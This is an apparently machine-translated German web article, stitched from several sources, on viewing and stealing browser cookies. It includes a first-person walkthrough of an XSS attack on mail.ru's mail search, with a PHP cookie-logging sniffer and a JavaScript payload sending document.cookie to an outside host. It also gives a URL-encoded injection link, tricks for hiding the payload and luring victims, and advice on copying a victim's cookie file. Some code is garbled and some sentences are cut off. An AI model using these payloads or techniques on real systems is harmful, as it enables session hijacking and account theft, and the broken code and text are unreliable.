So extrahieren Sie ein Passwort aus einem Cookie. Eine einfache Möglichkeit, mit evercookie überall Kekse zu stehlen

Öffnen Sie in Opera das Hauptmenü, gehen Sie zum Abschnitt „Einstellungen“ und wählen Sie die Zeile „Allgemeine Einstellungen ...“. Oder Sie drücken einfach die Hotkeys STRG + F12. Dadurch wird das Browser-Einstellungsfenster geöffnet, in dem Sie auf der Registerkarte „Erweitert“ im linken Bereich auf den Abschnitt „Cookies“ klicken müssen. Darin müssen Sie auf die Schaltfläche „Cookies verwalten“ klicken.

Öffnen Sie in Mozilla Firefox den Abschnitt „Extras“ im Menü und wählen Sie „Einstellungen“. Im Einstellungsfenster müssen Sie zur Registerkarte „Datenschutz“ gehen, dort eine Schaltfläche mit der Aufschrift „Cookies anzeigen …“ finden und darauf klicken, um auf die Liste der vom Browser gespeicherten Cookies zuzugreifen. Sie können sie hier suchen und ansehen.

Erweitern Sie im Internet Explorer den Abschnitt „Extras“ im Menü und wählen Sie „Eigenschaften“. Gehen Sie im Einstellungsfenster „Eigenschaften“ zur Registerkarte „Allgemein“ und klicken Sie im Abschnitt „Browserverlauf“ auf die Schaltfläche „Optionen“. Auf diese Weise öffnen Sie ein weiteres Fenster („Optionen für temporäre Dateien“), in dem Sie auf die Schaltfläche „Dateien anzeigen“ klicken müssen.

Klicken Sie in der Inhaltsliste des sich öffnenden Internet Explorer-Ordners für temporäre Dateien auf die Überschrift „Name“. Auf diese Weise können Sie alle Cookie-Dateien in einem Block in einem gemeinsamen Haufen heterogener Dateien gruppieren. Hier können Sie die Datei finden, die Sie interessiert, und sie im Standard-Notepad öffnen, um sie anzuzeigen oder zu bearbeiten.

Klicken Sie in Google Chrome auf das Schraubenschlüsselsymbol in der oberen rechten Ecke des Fensters und wählen Sie im Menü Optionen aus. Der Browser öffnet die Seite „Einstellungen“, und Sie klicken im linken Bereich auf den Link „Erweitert“ und auf der Seite mit den erweiterten Einstellungen auf die Schaltfläche „Inhaltseinstellungen“. Dies ist nicht die letzte Seite auf dem Weg zu den von diesem Browser gespeicherten Cookies.

Klicken Sie auf der nächsten Seite auf die Schaltfläche „Alle Cookies und Websitedaten“ und Sie haben endlich Zugriff auf die Liste der Cookies.

Google Chrome bietet die Möglichkeit, Cookies zu suchen, anzuzeigen und zu löschen.

Klicken Sie im Safari-Browser auf das Zahnradsymbol in der oberen rechten Ecke und wählen Sie „Einstellungen…“. Im Fenster zum Ändern der Einstellungen müssen Sie im Reiter „Sicherheit“ auf die Schaltfläche „Cookies anzeigen“ klicken. Safari bietet lediglich Funktionen zum Suchen und Löschen von Cookies; der Inhalt dieser temporären Dateien ist hier nur teilweise sichtbar.

Kekse - Informationen in Form einer Textdatei, die von der Website auf dem Computer des Benutzers gespeichert werden. Enthält Authentifizierungsdaten (Login/Passwort, ID, Telefonnummer, Postfachadresse), Benutzereinstellungen, Zugriffsstatus. Wird im Browserprofil gespeichert.

Cookie-Hacking ist der Diebstahl (oder „Hijacking“) der Sitzung eines Webressourcenbesuchers. Private Informationen stehen nicht nur dem Absender und dem Empfänger zur Verfügung, sondern auch einem Dritten – der Person, die das Abfangen durchgeführt hat.

Cookie-Hacking-Tools und -Techniken

Computerdiebe verfügen wie ihre Kollegen im echten Leben neben Geschick, Geschicklichkeit und Wissen natürlich auch über ihr eigenes Werkzeug – eine Art Arsenal an Generalschlüsseln und Sonden. Werfen wir einen Blick auf die beliebtesten Tricks, mit denen Hacker Cookies von Internetnutzern extrahieren.

Schnüffler

Spezielle Programme zur Überwachung und Analyse des Netzwerkverkehrs. Ihr Name kommt vom englischen Verb „sniff“ (schnüffeln), weil. übertragene Pakete zwischen Knoten buchstäblich „aufschnüffeln“.

Doch Angreifer nutzen einen Sniffer, um Sitzungsdaten, Nachrichten und andere vertrauliche Informationen abzufangen. Ziel ihrer Angriffe sind vor allem ungeschützte Netzwerke, in denen Cookies in einer offenen HTTP-Sitzung, also praktisch unverschlüsselt, versendet werden. (Öffentliches WLAN ist in dieser Hinsicht am anfälligsten.)

Um einen Sniffer in den Internetkanal zwischen dem Benutzerknoten und dem Webserver einzubetten, werden folgende Methoden verwendet:

„Abhören“ von Netzwerkschnittstellen (Hubs, Switches);
Verzweigen und Kopieren des Datenverkehrs;
Verbindung zu einer Netzwerkkanallücke herstellen;
Analyse durch spezielle Angriffe, die den Datenverkehr des Opfers zum Sniffer umleiten (MAC-Spoofing, IP-Spoofing).

Die Abkürzung XSS steht für Cross Site Scripting. Wird zum Angriff auf Websites verwendet, um Benutzerdaten zu stehlen.

Das Prinzip von XSS ist wie folgt:

Ein Angreifer fügt bösartigen Code (ein spezielles getarntes Skript) in eine Webseite einer Website, eines Forums oder in eine Nachricht ein (z. B. bei der Korrespondenz in einem sozialen Netzwerk);
das Opfer geht auf die infizierte Seite und aktiviert den installierten Code auf seinem PC (klickt, folgt einem Link usw.);
Im Gegenzug „extrahiert“ der ausgeführte Schadcode vertrauliche Daten des Benutzers aus dem Browser (insbesondere Cookies) und sendet sie an den Webserver des Angreifers.

Um einen Software-XSS-Mechanismus zu „implantieren“, nutzen Hacker alle möglichen Schwachstellen in Webservern, Onlinediensten und Browsern.

Alle XSS-Schwachstellen werden in zwei Typen unterteilt:

Passiv. Der Angriff erfolgt durch die Anforderung eines bestimmten Skripts auf einer Webseite. Schädlicher Code kann in verschiedenen Formen auf einer Webseite eingeschleust werden (z. B. in die Suchleiste der Website). Am anfälligsten für passives XSS sind Ressourcen, die beim Eintreffen von Daten keine HTML-Tags filtern.
Aktiv. Befindet sich direkt auf dem Server. Und sie werden im Browser des Opfers aktiviert. Sie werden von Betrügern aktiv in Blogs, Chats und Newsfeeds aller Art genutzt.

Hacker „tarnen“ ihre XSS-Skripte sorgfältig, damit das Opfer keinen Verdacht schöpft. Sie ändern die Dateiendung, geben den Code als Bild aus, motivieren zum Folgen des Links und locken mit interessanten Inhalten. Das Ergebnis: Ein PC-Benutzer, der seine eigene Neugier nicht kontrollieren kann, sendet eigenhändig (per Mausklick) Sitzungscookies (mit Login und Passwort!) an den Autor des XSS-Skripts – den Computerschurken.

Cookie-Ersatz

Alle Cookies werden gespeichert und unverändert – in ihrer ursprünglichen Form – mit denselben Werten, Zeichenfolgen und anderen Daten an den Webserver (von dem sie „stammen“) gesendet. Die absichtliche Änderung ihrer Parameter wird als Cookie-Ersetzung bezeichnet. Mit anderen Worten: Beim Ersetzen von Cookies täuscht der Angreifer Wunschdenken vor. Wenn Sie beispielsweise in einem Online-Shop bezahlen, ändert das Cookie den Zahlungsbetrag nach unten – es kommt also zu einer „Einsparung“ bei Einkäufen.

Gestohlene Sitzungscookies in einem sozialen Netzwerk vom Konto einer anderen Person werden in eine andere Sitzung und auf einem anderen PC „eingefügt“. Der Besitzer der gestohlenen Cookies erhält vollen Zugriff auf das Konto des Opfers (Korrespondenz, Inhalte, Seiteneinstellungen), solange es sich auf seiner Seite befindet.

Die „Bearbeitung“ von Cookies erfolgt über:

„Cookies verwalten…“-Funktionen im Opera-Browser;
Cookies Manager- und Advanced Cookie Manager-Add-ons für Firefox;
IECookiesView-Dienstprogramme (nur Internet Explorer);
ein Texteditor wie AkelPad, NotePad oder Windows Notepad.

Physischer Zugriff auf Daten

Ein sehr einfaches Implementierungsschema, bestehend aus mehreren Schritten. Es ist jedoch nur wirksam, wenn der Computer des Opfers mit einer offenen Sitzung, beispielsweise VKontakte, unbeaufsichtigt bleibt (und zwar für längere Zeit!):

Um alle gespeicherten Cookies anzuzeigen, wird in die Adressleiste des Browsers eine Javascript-Funktion eingegeben.
Nach dem Drücken von „ENTER“ erscheinen alle auf der Seite.
Cookies werden kopiert, in einer Datei gespeichert und dann auf ein Flash-Laufwerk übertragen.
Auf einem anderen PC werden Cookies in einer neuen Sitzung ersetzt.
Es wird Zugriff auf das Konto des Opfers gewährt.

In der Regel verwenden Hacker die oben genannten Tools (+ andere) sowohl in Kombination (da das Schutzniveau vieler Webressourcen recht hoch ist) als auch einzeln (wenn Benutzer übermäßig naiv sind).

XSS + Sniffer

Es wird ein XSS-Skript erstellt, das die Adresse eines Online-Sniffers angibt (entweder selbst erstellt oder ein bestimmter Dienst).
Der Schadcode wird mit der Erweiterung .img (Bildformat) gespeichert.
Diese Datei wird dann auf eine Website-Seite, einen Chat oder eine persönliche Nachricht hochgeladen – wo der Angriff ausgeführt wird.
Die Aufmerksamkeit des Nutzers wird auf die geschaffene „Falle“ gelenkt (hier kommt Social Engineering ins Spiel).
Wird die Falle ausgelöst, werden die Cookies vom Browser des Opfers vom Sniffer abgefangen.
Der Angreifer öffnet die Sniffer-Protokolle und ruft die gestohlenen Cookies ab.
Als nächstes führt es eine Ersetzung durch, um mithilfe der oben genannten Tools die Rechte des Kontoinhabers zu erhalten.

Cookies vor Hackerangriffen schützen

Verwenden Sie eine verschlüsselte Verbindung (unter Verwendung geeigneter Protokolle und Sicherheitsmethoden).
Reagieren Sie nicht auf zweifelhafte Links, Bilder oder verlockende Angebote, sich mit „neuer kostenloser Software“ vertraut zu machen. Vor allem von Fremden.
Verwenden Sie nur vertrauenswürdige Webressourcen.
Beenden Sie die autorisierte Sitzung, indem Sie auf die Schaltfläche „Abmelden“ klicken (nicht nur den Tab schließen!). Vor allem, wenn Sie sich nicht von einem PC aus in Ihr Konto eingeloggt haben, sondern beispielsweise von einem PC in einem Internetcafé aus.
Verwenden Sie nicht die Funktion „Passwort speichern“ des Browsers. Gespeicherte Registrierungsdaten erhöhen das Diebstahlrisiko erheblich. Seien Sie nicht faul und verschwenden Sie nicht zu Beginn jeder Sitzung ein paar Minuten mit der Eingabe Ihres Passworts und Ihrer Anmeldung.
Nach dem Surfen im Internet – Besuch sozialer Netzwerke, Foren, Chats, Websites – löschen Sie gespeicherte Cookies und leeren Sie den Browser-Cache.
Aktualisieren Sie regelmäßig Browser und Antivirensoftware.
Verwenden Sie Browsererweiterungen, die vor XSS-Angriffen schützen (z. B. NoScript für FF und Google Chrome).
Periodisch in Konten.

Und das Wichtigste: Verlieren Sie beim Entspannen oder Arbeiten im Internet nicht die Wachsamkeit und Aufmerksamkeit!

Darin wurde vorgeschlagen, an einer kostenlosen Veranstaltung zum Thema Informationssicherheit teilzunehmen. Da die Veranstaltung in meiner Stadt stattfand, beschloss ich, dass ich unbedingt dorthin gehen musste. Die erste Lektion war den Schwachstellen auf Websites wie XSS gewidmet. Nach der Lektion entschied ich, dass ich das erworbene Wissen unter realen Bedingungen festigen musste. Ich wählte mehrere Websites aus, die sich auf meine Stadt beziehen, und versuchte, mein Drehbuch in alle Formen einzufügen. In den meisten Fällen wurde das Skript herausgefiltert. Aber es kam vor, dass der „Alarm“ ausgelöst wurde und meine Nachricht erschien. Ich habe die gefundene Schwachstelle den Administratoren gemeldet und sie haben alles schnell behoben.

An einem dieser Tage fiel mir beim Überprüfen der neuesten E-Mails auf mail.ru ein Formular zum Durchsuchen von Briefen im Postfach ins Auge. Gelegentlich nutzte ich diese Suche, um in einem Stapel meiner alten Briefe etwas zu finden, das ich brauchte. Nun, da ich in den letzten Tagen meine „Alarmierung“ fast überall eingefügt habe, griff meine Hand reflexartig nach diesem Suchformular. Ich habe den Code für mein Skript eingegeben und die Eingabetaste gedrückt. Stellen Sie sich meine Überraschung vor, als ich eine schmerzlich vertraute Nachricht auf dem Bildschirm sah ...

Beim Vortrag „Open InfoSec Days“ sagte der Redner, dass Programmierer Schwachstellen dieser Art eher skeptisch gegenüberstehen und sagte: „Alarm? Na und? Es ist nicht gefährlich. Wenn ich auf anderen Seiten nur mit diesem Fenster mit meiner Nachricht zufrieden war, habe ich mich in diesem Fall entschieden, noch einen Schritt weiter zu gehen und zu zeigen, was aus einer solchen „Warnung“ entstehen kann.

Das Skript funktioniert also, was bedeutet, dass eine Sicherheitslücke besteht. Daher können Sie versuchen, ein anderes Skript auszuführen. Zum Beispiel ein Skript, das die Cookies eines anderen Benutzers an uns sendet. Damit das Skript funktioniert, müssen wir den Benutzer zwingen, unser Skript auszuführen. Dies kann erfolgen, indem Sie ihm einen Brief mit dem entsprechenden Link senden, nach dem Anklicken wird das Postfach durchsucht und der von uns benötigte Code ausgeführt.

Es erforderte einige Zeit und viele Experimente, um die Mechanismen der Sicherheitslücke zu verstehen. Manchmal funktionierte das Skript, manchmal wurde es herausgefiltert. Nach einigem Aufwand wurde empirisch festgestellt, dass das Skript nur dann zu 100 % funktioniert, wenn die Suche nach Buchstaben ein positives Ergebnis liefert. Das heißt, wenn ein Benutzer eine Suche mit unserem Skript durchführt, ist es notwendig, dass mindestens ein Brief in seinem Postfach gemäß den angegebenen Parametern gefunden wird. Es ist nicht schwer, dies zu arrangieren.

if (isset($_GET["cookie"]))
{
$text = „Neues Cookie akzeptieren von“. $_SERVER["REMOTE_ADDR"] ." bei ". date("l jS \of F Y h:i:s A");
$text .= "\n".str_repeat("=", 22) . "\N" . $_GET["cookie"]."\n".str_repeat("=", 22)."\n";
$file = fopen("sniff.txt", "a");
fwrite($file, $text);
fclose($file);
}
?>

Außerdem benötigen wir anstelle einer „Warnung“ ein Skript, das Cookies an unseren Sniffer überträgt. Wir werden dieses Skript in eine separate Datei schreiben und in unsere Suche laden. Ich habe eine test.js-Datei mit dem notwendigen Code erstellt und auf das Hosting hochgeladen. Der Skriptcode sieht folgendermaßen aus:

Img=neues Bild();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
Funktion F() (
location="http://www.solife.ru";
}
setTimeout(F, 5000);

Was ich hier klarstellen möchte. Versetzen wir uns in die Lage des Angreifers. Wir benötigen, dass der Benutzer auf den Link klickt. Wie kann ich ihn dazu zwingen? Sie können Berge von Gold versprechen und um diese zu erhalten, müssen Sie unserem Link zur Website folgen. Aber ich glaube nicht, dass es funktionieren wird. Darauf fallen die Leute nicht mehr rein (ich selbst lösche ständig solche Briefe, ohne sie überhaupt zu lesen). Deshalb werden wir mit dem menschlichen Mitleid spielen, da es in der Natur immer noch existiert. Wir bitten Sie, auf der Website für die Rettung gefährdeter Tiere abzustimmen. Zuerst nehmen wir die Cookies und leiten den Benutzer dann zur Abstimmungsseite weiter. Der Timeout für die Weiterleitung wurde auf 5 Sekunden eingestellt, andernfalls hatten die Cookies einfach keine Zeit, an den Sniffer übertragen zu werden, und der Benutzer wurde sofort auf eine Seite über Tiere weitergeleitet. Anstelle einer „Warnung“ habe ich das folgende Skript verwendet:

Als ich mit den Skripten fertig war, fing ich an, den Brief zu schreiben. Ich habe mir so etwas ausgedacht:

Es stellte sich als ziemlich zynisch heraus, aber ich habe versucht, die Bedingungen so nah wie möglich an die Realität heranzuführen. Am Ende des Briefes befindet sich eine Zeile mit einem Skript, damit unser Brief bei einer Suche gefunden wird. Damit die Linie keine unnötigen Fragen aufwirft, habe ich sie weiß gestrichen. Ich habe auch ein Leerzeichen in das Wort „http“ eingefügt, damit die Zeichenfolge nicht erkannt und in einen Link umgewandelt wird. Andernfalls würde der Link trotz der Tatsache, dass die Skriptzeile in weißer Schrift geschrieben ist, vom Empfänger blau hervorgehoben werden, was wir nicht benötigen. Die intelligente Suche findet und erkennt diese Zeichenfolge trotz der Leerzeichen weiterhin.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

Ich habe für das Skript eine URL-Kodierung verwendet, damit nichts herausgefiltert wurde. Außerdem habe ich den Parameter „q_folder=0“ für die Suche hinzugefügt, sodass die Suche im Ordner „Posteingang“ erfolgt.

Der Brief ist fertig, wir verschicken ihn. Ich habe mein zweites Postfach beim gleichen Dienst genutzt wie der Empfänger. Mal sehen, was in der anderen Box passiert ist.

Unser Skripttext ist nicht sichtbar, da er mit dem Hintergrund verschmilzt. Klicken wir auf den Link und sehen, was passiert. Der Benutzer wird basierend auf dem von uns angegebenen Parameter zu den Suchergebnissen für E-Mails weitergeleitet. Unser von uns gesendeter Brief ist in den Suchergebnissen sichtbar. Zu diesem Zeitpunkt hat unser Skript bereits funktioniert und die Cookies des Benutzers an den Sniffer gesendet. Nach 5 Sekunden (die Zeit hängt von den Skripteinstellungen ab) wird der Benutzer zur Abstimmungsseite weitergeleitet.

Ich überprüfe meine sniff.txt-Datei:

Da es nicht mein Ziel ist, die Kartons anderer Leute zu stehlen oder sich Zugang zu ihnen zu verschaffen, beende ich die Geschichte hier. Aber theoretisch können Sie Ihre Cookies durch die einer anderen Person ersetzen und so Zugriff auf die Mailbox einer anderen Person erhalten. Wenn sich ein Angreifer auf ein Ziel konzentriert, wird er im Allgemeinen einen Nutzen für die erhaltenen Informationen finden.

Ich möchte Sergei Belov danken (

Das Bild zeigt, dass das Cookie die Zeile wordpress_logged_in_263d663a02379b7624b1028a58464038=admin enthält. Dieser Wert befindet sich in unverschlüsselter Form im Cookie und kann mit dem Achilles-Dienstprogramm leicht abgefangen werden. In den meisten Fällen können Sie in Achilles jedoch nur den Hash eines bestimmten Eintrags sehen. Bevor Sie die Anfrage an den Server senden, können Sie versuchen, diese Zeile durch eine ähnliche zu ersetzen (obwohl dies in diesem Fall keinen Sinn macht) – die Anzahl der Versuche ist nicht begrenzt. Wenn Sie diese Anfrage dann über die Schaltfläche „Senden“ an den Server senden, können Sie vom Server eine für den Administrator bestimmte Antwort erhalten.

Im vorherigen Beispiel können Sie direktes Benutzer-ID-Spoofing verwenden. Darüber hinaus kann der Name des Parameters, dessen Wertersetzung dem Hacker zusätzliche Möglichkeiten bietet, wie folgt lauten: Benutzer (zum Beispiel USER=JDOE), jeder Ausdruck mit einer ID-Zeichenfolge (zum Beispiel USER=JDOE oder SESSIONID= BLAHBLAH), Admin (zum Beispiel ADMIN=TRUE), Sitzung (zum Beispiel SESSION=ACTIVE), Warenkorb (zum Beispiel CART=FULL) sowie Ausdrücke wie TRUE, FALSE, ACTIVE, INACTIVE. Typischerweise hängt das Format von Cookies stark von der Anwendung ab, für die sie verwendet werden. Diese Tipps zum Auffinden von Anwendungsfehlern mithilfe von Cookies gelten jedoch für fast alle Formate.

Clientseitige Gegenmaßnahmen gegen die Cookie-Extraktion

Generell sollten Benutzer vor Websites vorsichtig sein, die Cookies zur Authentifizierung und zum Speichern sensibler Daten verwenden. Es ist auch zu beachten, dass eine Website, die Cookies zur Authentifizierung verwendet, mindestens das SSL-Protokoll zur Verschlüsselung des Benutzernamens und des Passworts unterstützen muss, da die Daten ohne dieses Protokoll unverschlüsselt übertragen werden und somit abgefangen werden können Verwenden einfacher Softwaretools zum Anzeigen der über das Netzwerk gesendeten Daten.

Kookaburra Software hat ein Tool entwickelt, um die Verwendung von Cookies zu erleichtern. Das Tool heißt CookiePal ( http://www.kburra.com/cpal.html (siehe www.kburra.com)). Dieses Programm soll den Benutzer warnen, wenn eine Website versucht, ein Cookie auf dem Computer zu installieren, und der Benutzer kann diese Aktion zulassen oder ablehnen. Ähnliche Cookie-Blockierungsfunktionen sind heute in allen Browsern verfügbar.

Ein weiterer Grund für die regelmäßige Installation von Webbrowser-Updates besteht darin, dass in diesen Programmen immer wieder Sicherheitslücken festgestellt werden. Deshalb haben Bennet Haselton und Jamie McCarthy ein Skript erstellt, das nach dem Klicken auf einen Link Cookies vom Computer des Kunden abruft. Dadurch werden alle Inhalte der Cookies verfügbar, die sich auf dem Computer des Benutzers befinden.

Diese Art von Hack kann auch mit dem Griff durchgeführt werden , eingebettet in HTML-Text auf einer Webseite (oder HTML-Inhalt in einer E-Mail oder einem Newsgroup-Newsletter), um Cookies zu stehlen. Betrachten Sie das folgende Beispiel:</p> <table><tr><td class="code"> <iframe src=”http://www.peacefire.org%2fsecurity%2fiecookies%2f showcookie.html%3f.yahoo.com/”>

Um sicherzustellen, dass solche Dinge unsere persönlichen Daten nicht gefährden, mache ich das selbst und rate jedem, Software, die mit HTML-Code funktioniert (E-Mail-Clients, Mediaplayer, Browser usw.), immer zu aktualisieren.

Viele Leute ziehen es vor, Cookies einfach zu blockieren, aber die meisten Websites erfordern zum Durchsuchen Cookies. Fazit: Wenn in naher Zukunft eine innovative Technologie erscheint, die es ermöglicht, auf Cookies zu verzichten, werden Programmierer und Administratoren aufatmen, aber Cookies bleiben vorerst ein Leckerbissen für einen Hacker! Das stimmt, denn eine bessere Alternative gibt es noch nicht.

Serverseitige Gegenmaßnahmen

Bei Empfehlungen zur Gewährleistung der Serversicherheit geben Experten einen einfachen Rat: Verwenden Sie den Cookie-Mechanismus nur, wenn dies unbedingt erforderlich ist! Besondere Vorsicht ist bei der Verwendung von Cookies geboten, die über das Ende der Kommunikationssitzung hinaus auf dem System des Nutzers verbleiben.

Natürlich ist es wichtig zu verstehen, dass Cookies verwendet werden können, um Webservern Sicherheit für die Benutzerauthentifizierung zu bieten. Wenn Ihre Anwendung Cookies verwenden muss, sollten Sie den Cookie-Mechanismus so konfigurieren, dass für jede Sitzung unterschiedliche Schlüssel mit kurzer Gültigkeitsdauer verwendet werden, und versuchen Sie, in diesen Dateien keine Informationen abzulegen, die von Hackern zum Hacken verwendet werden könnten (z. B. ADMIN= WAHR).

Um die Sicherheit im Umgang mit Cookies zu erhöhen, können Sie darüber hinaus die Cookie-Verschlüsselung nutzen, um die Extraktion sensibler Informationen zu verhindern. Natürlich löst die Verschlüsselung nicht alle Sicherheitsprobleme bei der Arbeit mit der Cookie-Technologie, aber diese Methode verhindert die oben beschriebenen grundlegendsten Hacks.

Zur Frage Wie bekomme ich COOKIES-Cookies? Ich brauche Kekse, wie bekomme ich sie, bitte sagen Sie es mir!!! 1 vom Autor gegeben Vlad eeEEeeeeeeeee Die beste Antwort ist Was sind Cookies?
Tatsache ist, dass Programmentwickler bei der Entwicklung von WWW-Technologien und der Einführung von Programmiersprachen im Internet vor einem sehr ernsten Problem standen: Wie können die Ergebnisse des Algorithmus für jeden einzelnen Benutzer für lange Zeit gespeichert werden? Das HTTP-Protokoll selbst ist nicht in der Lage, die Ergebnisse von Softwareprozessen aufzuzeichnen. Auch der Einsatz von Sitzungen stellt keine Lösung des Problems dar, da deren Wirkung unmittelbar nach dem Abbruch der Verbindung zum Server endet.
Das Problem wurde mit der Einführung des Cookie-Mechanismus (d. h. aus dem Englischen als „Cookies“ übersetzt) gelöst. Cookies haben eine bemerkenswerte Eigenschaft: Sie werden auf der Festplatte des Benutzers gespeichert und können dort nahezu unbegrenzt gespeichert werden.
Im Kern handelt es sich bei Cookies um gewöhnliche Textdateien, die in einem speziellen Verzeichnis gespeichert werden, das vom Browser verwendet wird (normalerweise heißt dieser Ordner „Temporäre Internetdateien“). Sie können sie sehen, indem Sie in dieses Verzeichnis gehen (der Schnellzugriff für den IE-Browser erfolgt über die Tools). Menüpunkte -> Internetoptionen -> Temporäre Internetdateien -> Einstellungen -> Anzeigen
Einige Cookie-Werte können nur für eine Sitzung gespeichert werden und werden beim Schließen des Browsers gelöscht. Andere, die auf einen bestimmten Zeitraum festgelegt sind, werden in eine Datei geschrieben. Im Allgemeinen heißt diese Datei „cookies.txt“ (es können jedoch mehrere davon sein) und befindet sich im Arbeitsverzeichnis des auf dem Computer installierten Browsers.
mit anderen Worten
Ein Cookie ist eine kleine Textinformation, die der Server an den Browser sendet. Cookies selbst können nichts bewirken, aber wenn ein Benutzer den Server kontaktiert (in die Browserzeile eingibt), kann der Server die in den Cookies enthaltenen Informationen lesen und auf der Grundlage ihrer Analyse beliebige Aktionen ausführen. Beispielsweise werden bei einem autorisierten Zugriff auf etwas über das Internet der Benutzername und das Passwort während der Sitzung in Cookies gespeichert, sodass der Benutzer sie bei der Anforderung jedes passwortgeschützten Dokuments nicht erneut eingeben muss.
Wenn Sie versuchen, über dieses Thema Zugriff auf die passwortgeschützten Konten anderer Personen zu erhalten, müssen Sie einen Weg aus der Ferne (Trojaner) oder durch offensichtliches Kopieren auf ein Flash-Laufwerk finden, sofern Sie Zugriff auf den Computer haben, auf dem das Opfer arbeitet , kopieren Sie diese Datei „cookies.txt“ und ersetzen Sie sie in Ihrem (gleichen) Browser. Als nächstes gehen Sie auf die gewünschte Seite, auf der sich das Konto befindet, an dem Sie interessiert sind, und erhalten automatisch Zugriff. Beachten Sie jedoch, dass die Informationen über die Sitzung in den Cookies gelöscht werden und Sie keinen Zugriff mehr erhalten, wenn das Opfer nach Abschluss der Arbeit auf „Abmelden“ (z. B. per E-Mail) klickt.
Mozilla Firefox speichert Cookies im Benutzerprofil, in der Datei C:Dokumente und EinstellungenBenutzernameAnwendungsdatenMozillaFirefoxProfiles<имя профиля>Cookies.txt
Internet Explorer speichert diese Cookies als separate Textdateien im Ordner „BenutzernameCookies“ von C:Dokumente und Einstellungen
Opera speichert Cookies in der Datei C:Dokumente und EinstellungenBenutzernameAnwendungsdatenOperaOperaprofilecookies4.dat

Alles über mobile Technologie